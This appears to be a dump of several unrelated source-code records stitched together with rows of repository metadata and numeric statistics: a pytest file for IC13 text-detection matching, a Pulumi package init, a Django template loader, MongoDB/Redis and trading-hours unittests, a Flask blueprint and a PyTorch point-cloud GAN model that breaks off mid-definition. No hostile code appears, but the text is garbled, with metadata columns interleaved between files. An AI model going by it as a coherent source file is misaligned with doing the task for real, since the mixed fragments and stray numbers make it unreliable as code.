    precision_mat = np.array([[1, 0.6], [0, 0]])
    assert not utils.one2one_match_ic13(
        gt_id, det_id, recall_mat, precision_mat, recall_thr, precision_thr)
def test_one2many_match_ic13():
    """Test utils.one2many_match_ic13: validation plus matched/unmatched cases."""
    gt_id = 0
    recall_mat = np.array([[1, 0], [0, 0]])
    precision_mat = np.array([[1, 0], [0, 0]])
    recall_thr = 0.5
    precision_thr = 0.5
    gt_match_flag = [0, 0]
    det_match_flag = [0, 0]
    det_dont_care_index = []
    # test invalid arguments.
    # gt_id must be int; matrices ndarrays; thresholds <= 1; flags/index lists.
    with pytest.raises(AssertionError):
        gt_id_tmp = 0.0
        utils.one2many_match_ic13(gt_id_tmp, recall_mat, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, det_dont_care_index)
    with pytest.raises(AssertionError):
        recall_mat_tmp = [1, 0]
        utils.one2many_match_ic13(gt_id, recall_mat_tmp, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, det_dont_care_index)
    with pytest.raises(AssertionError):
        precision_mat_tmp = [1, 0]
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat_tmp,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, det_dont_care_index)
    with pytest.raises(AssertionError):
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, 1.1,
                                  precision_thr, gt_match_flag, det_match_flag,
                                  det_dont_care_index)
    with pytest.raises(AssertionError):
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
                                  1.1, gt_match_flag, det_match_flag,
                                  det_dont_care_index)
    with pytest.raises(AssertionError):
        gt_match_flag_tmp = np.array([0, 1])
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
                                  precision_thr, gt_match_flag_tmp,
                                  det_match_flag, det_dont_care_index)
    with pytest.raises(AssertionError):
        det_match_flag_tmp = np.array([0, 1])
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
                                  precision_thr, gt_match_flag,
                                  det_match_flag_tmp, det_dont_care_index)
    with pytest.raises(AssertionError):
        det_dont_care_index_tmp = np.array([0, 1])
        utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
                                  precision_thr, gt_match_flag, det_match_flag,
                                  det_dont_care_index_tmp)
    # test matched case
    # gt 0 matches detection 0: result is (matched, [matched det ids]).
    result = utils.one2many_match_ic13(gt_id, recall_mat, precision_mat,
                                       recall_thr, precision_thr,
                                       gt_match_flag, det_match_flag,
                                       det_dont_care_index)
    assert result[0]
    assert result[1] == [0]
    # test unmatched case
    # A gt already flagged as matched (flag 1) cannot match again.
    gt_match_flag_tmp = [1, 0]
    result = utils.one2many_match_ic13(gt_id, recall_mat, precision_mat,
                                       recall_thr, precision_thr,
                                       gt_match_flag_tmp, det_match_flag,
                                       det_dont_care_index)
    assert not result[0]
    assert result[1] == []
def test_many2one_match_ic13():
    """Test utils.many2one_match_ic13: validation plus matched/unmatched cases."""
    det_id = 0
    recall_mat = np.array([[1, 0], [0, 0]])
    precision_mat = np.array([[1, 0], [0, 0]])
    recall_thr = 0.5
    precision_thr = 0.5
    gt_match_flag = [0, 0]
    det_match_flag = [0, 0]
    gt_dont_care_index = []
    # test invalid arguments.
    # det_id must be int; matrices ndarrays; thresholds <= 1; flags/index lists.
    with pytest.raises(AssertionError):
        det_id_tmp = 1.0
        utils.many2one_match_ic13(det_id_tmp, recall_mat, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        recall_mat_tmp = [[1, 0], [0, 0]]
        utils.many2one_match_ic13(det_id, recall_mat_tmp, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        precision_mat_tmp = [[1, 0], [0, 0]]
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat_tmp,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        recall_thr_tmp = 1.1
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                  recall_thr_tmp, precision_thr, gt_match_flag,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        precision_thr_tmp = 1.1
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                  recall_thr, precision_thr_tmp, gt_match_flag,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        gt_match_flag_tmp = np.array([0, 1])
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag_tmp,
                                  det_match_flag, gt_dont_care_index)
    with pytest.raises(AssertionError):
        det_match_flag_tmp = np.array([0, 1])
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag_tmp, gt_dont_care_index)
    with pytest.raises(AssertionError):
        gt_dont_care_index_tmp = np.array([0, 1])
        utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                  recall_thr, precision_thr, gt_match_flag,
                                  det_match_flag, gt_dont_care_index_tmp)
    # test matched cases
    # detection 0 matches gt 0: result is (matched, [matched gt ids]).
    result = utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                       recall_thr, precision_thr,
                                       gt_match_flag, det_match_flag,
                                       gt_dont_care_index)
    assert result[0]
    assert result[1] == [0]
    # test unmatched cases
    # When the only matching gt is marked don't-care, no match is reported.
    gt_dont_care_index = [0]
    result = utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
                                       recall_thr, precision_thr,
                                       gt_match_flag, det_match_flag,
                                       gt_dont_care_index)
    assert not result[0]
    assert result[1] == []
| 36.465473
| 79
| 0.596788
| 1,848
| 14,258
| 4.288961
| 0.056277
| 0.012869
| 0.084784
| 0.15897
| 0.863235
| 0.8216
| 0.77782
| 0.753091
| 0.713727
| 0.665657
| 0
| 0.051173
| 0.306495
| 14,258
| 390
| 80
| 36.558974
| 0.750405
| 0.046921
| 0
| 0.57193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25614
| 1
| 0.049123
| false
| 0
| 0.010526
| 0
| 0.059649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0fcec5df484fa1f1d03d95f9c10307f07c2773f9
| 655
|
py
|
Python
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from .agent import *
from .connection import *
from .get_agent import *
from .get_agent_images import *
from .get_agents import *
from .get_connection import *
from .get_connections import *
from .get_job import *
from .get_jobs import *
from .get_migration import *
from .get_migrations import *
from .job import *
from .migration import *
from ._inputs import *
from . import outputs
| 28.478261
| 87
| 0.748092
| 97
| 655
| 4.927835
| 0.505155
| 0.292887
| 0.24477
| 0.096234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001828
| 0.164886
| 655
| 22
| 88
| 29.772727
| 0.872029
| 0.334351
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0fd5c56cd903aae7873d205163b2967ae3164fb9
| 197
|
py
|
Python
|
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-spaceless-templates
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | 2
|
2021-06-19T20:59:43.000Z
|
2021-08-17T23:16:26.000Z
|
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-template-minifying-loader
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | null | null | null |
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-template-minifying-loader
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | null | null | null |
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from ..mixins import TemplateMinifierMixin
class Loader(TemplateMinifierMixin, AppDirectoriesLoader):
    """Django app-directories template loader combined with TemplateMinifierMixin.

    The mixin is listed first so its method overrides take precedence over
    the stock AppDirectoriesLoader in the MRO; no extra behaviour is added
    here.
    """
    pass
| 24.625
| 82
| 0.847716
| 19
| 197
| 8.736842
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106599
| 197
| 7
| 83
| 28.142857
| 0.943182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
e8c744a8a1cc0f5ddf20aed871ea98d1a5b7c5d8
| 8,760
|
py
|
Python
|
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | 3
|
2019-08-31T18:01:10.000Z
|
2021-04-04T09:51:17.000Z
|
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | null | null | null |
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | 1
|
2020-08-15T17:04:14.000Z
|
2020-08-15T17:04:14.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2017/6/24
@author: MG
"""
import logging
import unittest
from config import Config, with_mongo_collection
from collections import OrderedDict
from pymongo.errors import DuplicateKeyError
import time
from datetime import datetime, timedelta
logger = logging.getLogger()
class MongoTest(unittest.TestCase):
    """Automated test cases for config.py's MongoDB helpers."""

    def test_insert_duplicate_raises(self):
        """Repeated insertion of the same document raises DuplicateKeyError.

        BUG FIX: this method previously had the same name as the test below,
        so Python silently discarded this definition and it never ran;
        renamed so both tests are collected.
        """
        odic = OrderedDict()
        odic['abc'] = 123
        odic['defg'] = 4567
        odic['xyz'] = 980
        odic['fhg'] = 456
        print(odic)
        collection_name = 'Hello'
        # Inserting the identical document object twice must fail on the
        # second insert (duplicate _id).
        with self.assertRaises(DuplicateKeyError):
            for n in range(2):
                time.sleep(2)
                with_mongo_collection(lambda col: col.insert_one(odic), collection_name)
        # Clean up the inserted document.
        # NOTE(review): pymongo's delete_many requires a filter argument;
        # delete_many() with no args raises TypeError before reaching the
        # server — confirm the intended cleanup filter (e.g. {'abc': 123}).
        with_mongo_collection(lambda col: col.delete_many(), collection_name)

    def test_deal_with_mongo_collection(self):
        """Field order of inserted documents is irrelevant: all are found.

        :return: None
        """
        dic_list = [
            OrderedDict([('abc', 123), ('defg', 4567), ('xyz', 980), ('fhg', 456), ('n', 0)]),
            OrderedDict([('defg', 4567), ('abc', 123), ('xyz', 980), ('fhg', 456), ('n', 1)]),
            OrderedDict([('xyz', 980), ('abc', 123), ('defg', 4567), ('fhg', 456), ('n', 2)]),
            OrderedDict([('fhg', 456), ('abc', 123), ('defg', 4567), ('xyz', 980), ('n', 3)]),
            OrderedDict([('n', 4), ('abc', 123), ('defg', 4567), ('xyz', 980), ('fhg', 456)]),
        ]
        for odic in dic_list:
            print(odic)
        collection_name = 'Hello'
        # Remove any leftovers from earlier runs, then insert the batch.
        with_mongo_collection(lambda c:
                              c.delete_many({'abc': 123}), collection_name)
        with_mongo_collection(lambda col: col.insert_many(dic_list), collection_name)

        def check(col):
            """Verify every matching record is found, in insertion order."""
            for n, raw in enumerate(col.find({'abc': 123})):
                print(n, raw)
                self.assertEqual(raw['n'], n)

        with_mongo_collection(check, collection_name)
        with_mongo_collection(lambda c:
                              c.delete_many({'abc': 123}), collection_name)
class RedisTest(unittest.TestCase):
    """Round-trip a key through the redis client provided by Config."""

    def test_redis(self):
        client = Config.get_redis()
        key = 'key1'
        client.set(key, 'hello world')
        # redis-py returns bytes, not str.
        self.assertEqual(client.get(key), b'hello world')
        client.delete(key)
        # After deletion the key no longer exists and reads back as None.
        self.assertFalse(client.exists(key))
        self.assertIsNone(client.get(key))
class THoursTest(unittest.TestCase):
    """Tests for Config.get_trade_datetime_range_list(instrument_id).

    Each test checks the trading sessions of one instrument family against
    the expected (start, end) datetime pairs anchored on today's date.
    Refactor: the five original tests duplicated the same datetime
    construction code and each carried an unused ``datetime_next_day``
    local; both issues are fixed by the two private helpers below, with the
    expected values unchanged.
    """

    @staticmethod
    def _today_at(now, hour, minute=0, day_offset=0):
        """Return today's date at hour:minute, shifted by day_offset days."""
        return (datetime(now.year, now.month, now.day, hour, minute)
                + timedelta(days=day_offset))

    def _assert_sessions(self, instrument_id, sessions):
        """Assert the configured trade ranges equal the expected sessions.

        :param instrument_id: contract code, e.g. 'if1712'
        :param sessions: list of ((hour, minute[, day_offset]),
            (hour, minute[, day_offset])) pairs
        """
        result = Config.get_trade_datetime_range_list(instrument_id)
        now = datetime.now()
        target = [(self._today_at(now, *start), self._today_at(now, *end))
                  for start, end in sessions]
        self.assertEqual(result, target)

    def test_if(self):
        # Index futures: two daytime sessions.
        self._assert_sessions('if1712', [
            ((9, 30), (11, 30)),
            ((13, 0), (15, 0)),
        ])

    def test_tf(self):
        # Treasury futures: earlier open, later close.
        self._assert_sessions('tf1712', [
            ((9, 15), (11, 30)),
            ((13, 0), (15, 15)),
        ])

    def test_rb(self):
        # Rebar: three daytime sessions plus a night session ending 23:00.
        self._assert_sessions('rb1712', [
            ((9, 0), (10, 15)),
            ((10, 30), (11, 30)),
            ((13, 30), (15, 0)),
            ((21, 0), (23, 0)),
        ])

    def test_au(self):
        # Gold: night session runs past midnight to 02:30 the next day.
        self._assert_sessions('au1712', [
            ((9, 0), (10, 15)),
            ((10, 30), (11, 30)),
            ((13, 30), (15, 0)),
            ((21, 0), (2, 30, 1)),
        ])

    def test_cu(self):
        # Copper: night session runs past midnight to 01:00 the next day.
        self._assert_sessions('cu1712', [
            ((9, 0), (10, 15)),
            ((10, 30), (11, 30)),
            ((13, 30), (15, 0)),
            ((21, 0), (1, 0, 1)),
        ])

    def test_cf(self):
        # Cotton: the original expected 23:30 *plus one day*; kept as-is,
        # NOTE(review): 23:30 the same day looks more plausible — confirm.
        self._assert_sessions('cf1712', [
            ((9, 0), (10, 15)),
            ((10, 30), (11, 30)),
            ((13, 30), (15, 0)),
            ((21, 0), (23, 30, 1)),
        ])
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format=Config.LOG_FORMAT)
unittest.main()
| 44.923077
| 108
| 0.644635
| 1,080
| 8,760
| 4.941667
| 0.128704
| 0.284429
| 0.142402
| 0.172381
| 0.760727
| 0.758104
| 0.740491
| 0.719693
| 0.695709
| 0.695709
| 0
| 0.040865
| 0.234589
| 8,760
| 194
| 109
| 45.154639
| 0.755108
| 0.030479
| 0
| 0.503497
| 0
| 0
| 0.02273
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.06993
| false
| 0
| 0.048951
| 0
| 0.13986
| 0.020979
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa068157d212152a538c6517014a53fc52c463c6
| 185
|
py
|
Python
|
wrappers/python/tests/indy.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/indy.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/indy.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
import pytest
from indy import libindy
# noinspection PyUnusedLocal
@pytest.mark.sync
def test_set_runtime_config():
libindy.set_runtime_config('{"crypto_thread_pool_size": 2}')
| 18.5
| 64
| 0.794595
| 25
| 185
| 5.56
| 0.76
| 0.143885
| 0.230216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006098
| 0.113514
| 185
| 9
| 65
| 20.555556
| 0.841463
| 0.140541
| 0
| 0
| 0
| 0
| 0.191083
| 0.171975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fa2ca1a8124da9945cc26a433ffd97d8d5b2edb4
| 152
|
py
|
Python
|
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.dont_write_bytecode = True
from .main import __version__,__author__
from .main import cli
| 21.714286
| 41
| 0.736842
| 23
| 152
| 4.434783
| 0.782609
| 0.156863
| 0.27451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007634
| 0.138158
| 152
| 6
| 42
| 25.333333
| 0.770992
| 0.276316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fa7220ea2fc15337fd98c0a6664709c4ab499a29
| 936
|
py
|
Python
|
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | 1
|
2016-04-17T11:00:22.000Z
|
2016-04-17T11:00:22.000Z
|
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | null | null | null |
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | null | null | null |
from x_rebirth_station_calculator.station_data import modules
from x_rebirth_station_calculator.station_data.station_base import Station
names = {'L044': 'Mega-Tank Farm',
'L049': 'Megaaquarium-Farm'}
smodules = [modules.SpiceTubes(efficiency=159),
modules.SpiceTubes(efficiency=159),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178)]
OL_MegaTankFarm = Station(names, smodules)
| 49.263158
| 74
| 0.715812
| 98
| 936
| 6.653061
| 0.295918
| 0.196319
| 0.220859
| 0.343558
| 0.815951
| 0.723926
| 0.723926
| 0.601227
| 0.601227
| 0.601227
| 0
| 0.046332
| 0.169872
| 936
| 18
| 75
| 52
| 0.792793
| 0
| 0
| 0.466667
| 0
| 0
| 0.058761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d70ddb07be6c5060dc8e08bd6bb710b00060cead
| 97
|
py
|
Python
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | 3
|
2018-06-30T22:29:02.000Z
|
2020-04-12T06:13:52.000Z
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | 4
|
2021-01-10T13:27:02.000Z
|
2021-03-21T05:19:10.000Z
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
api = Blueprint('api', __name__)
from app.api import views # noqa
| 16.166667
| 33
| 0.742268
| 14
| 97
| 4.857143
| 0.642857
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 97
| 5
| 34
| 19.4
| 0.85
| 0.041237
| 0
| 0
| 0
| 0
| 0.032967
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
d768da4587b257e154c21891ddfb30a1f7875dec
| 75
|
py
|
Python
|
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
import preprocessor.consolidate
preprocessor.consolidate.consolidateDays()
| 37.5
| 42
| 0.893333
| 6
| 75
| 11.166667
| 0.666667
| 0.686567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 75
| 2
| 42
| 37.5
| 0.930556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d772bb7f7cc2b98ab0d6d324efb5fa08cf0133f8
| 192
|
py
|
Python
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 5
|
2016-05-10T23:36:56.000Z
|
2021-04-21T17:09:18.000Z
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 6
|
2016-07-05T19:08:39.000Z
|
2017-10-23T10:59:14.000Z
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 5
|
2016-10-08T19:31:55.000Z
|
2021-10-10T18:24:42.000Z
|
#!/usr/bin/env python
import conda_build_test
conda_build_test
print("Test script setup.py")
if __name__ == "__main__":
from conda_build_test import manual_entry
manual_entry.main()
| 19.2
| 45
| 0.765625
| 29
| 192
| 4.517241
| 0.62069
| 0.229008
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 192
| 9
| 46
| 21.333333
| 0.793939
| 0.104167
| 0
| 0
| 0
| 0
| 0.163743
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d7829c816b65c7a6b4799388e22d4943997018e6
| 10,897
|
py
|
Python
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | 8
|
2021-08-29T11:52:45.000Z
|
2022-01-28T00:09:49.000Z
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | 1
|
2021-12-02T11:38:31.000Z
|
2021-12-08T22:44:57.000Z
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
class PermEqui1_max(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui1_max, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
def forward(self, x):
xm, _ = x.max(1, keepdim=True)
x = self.Gamma(x - xm)
return x
class PermEqui2_max(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui2_max, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
self.Lambda = nn.Linear(in_dim, out_dim, bias=False)
def forward(self, x):
xm, _ = x.max(1, keepdim=True)
xm = self.Lambda(xm)
x = self.Gamma(x)
x = x - xm
return x
class PermEqui2_mean(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui2_mean, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
self.Lambda = nn.Linear(in_dim, out_dim, bias=False)
def forward(self, x):
xm = x.mean(1, keepdim=True)
xm = self.Lambda(xm)
x = self.Gamma(x)
x = x - xm
return x
class G_inv_Tanh(nn.Module):
def __init__(self, x_dim, d_dim, z1_dim, pool="mean"):
super(G_inv_Tanh, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.pool = pool
if pool == "max":
self.phi = nn.Sequential(
PermEqui2_max(self.x_dim, self.d_dim),
nn.Tanh(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Tanh(),
)
elif pool == "max1":
self.phi = nn.Sequential(
PermEqui1_max(self.x_dim, self.d_dim),
nn.Tanh(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Tanh(),
)
elif pool == "mean":
self.phi = nn.Sequential(
PermEqui2_mean(self.x_dim, self.d_dim),
nn.Tanh(),
